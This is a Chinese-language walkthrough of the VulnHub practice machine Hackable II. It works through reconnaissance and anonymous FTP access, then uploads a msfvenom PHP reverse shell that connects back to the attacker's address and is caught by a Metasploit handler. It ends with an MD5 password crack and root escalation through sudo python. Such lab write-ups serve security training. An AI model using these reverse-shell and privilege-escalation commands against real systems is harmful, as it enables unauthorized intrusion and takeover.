『vulnhub系列』HACKABLE-II
下載地址:
https://www.vulnhub.com/entry/hackable-ii,711/
資訊蒐集:
使用nmap探測存活主機,發現主機開啟了21,22和80埠
訪問80埠的web服務,發現apache預設頁面
使用dirsearch進行目錄爆破,發現files 目錄
dirsearch -u "http://192.168.199.135/"
訪問files 頁面發現CALL.html
訪問CALL.html發現只有一段話
這條路的線索暫時斷了,我們使用匿名登入ftp,發現CALL.html
ftp 192.168.199.135
#使用anonymous登入,密碼為空
get之後發現就是我們剛剛在files中發現的CALL.html
漏洞利用:
此時我們上傳反彈shell(使用msfvenom生成)
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.199.129 lport=4444 -o re_shell.php
#生成反彈shell
put re_shell.php
#上傳反彈shell
進入files檔案,發現我們剛剛上傳的re_shell.php
我們使用msfconsole進行監聽
msfconsole
use exploit/multi/handler
set lhost 192.168.199.129
set payload php/meterpreter/reverse_tcp
run
開啟監聽後,訪問re_shell.php ,反彈成功
進入shell,使用python開啟互動式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
提升許可權:
我們在/home中發現了important.txt ,讀取發現“執行指令碼發現資料”
讀取/.runme.sh 發現secret key trolled 還有下面的shrek:cf4c2232354952690368f1b3dfdfb24d
使用md5解密得到密碼onion
切換sherk,使用密碼onion,登陸成功
獲得user.txt
使用sudo -l 檢視當前使用者可以以root許可權執行的命令,發現python命令可以以root許可權提權
此時我們使用python 進行提權,成功
sudo python3.5 -c 'import os;os.system("/bin/bash");'
得到root.txt
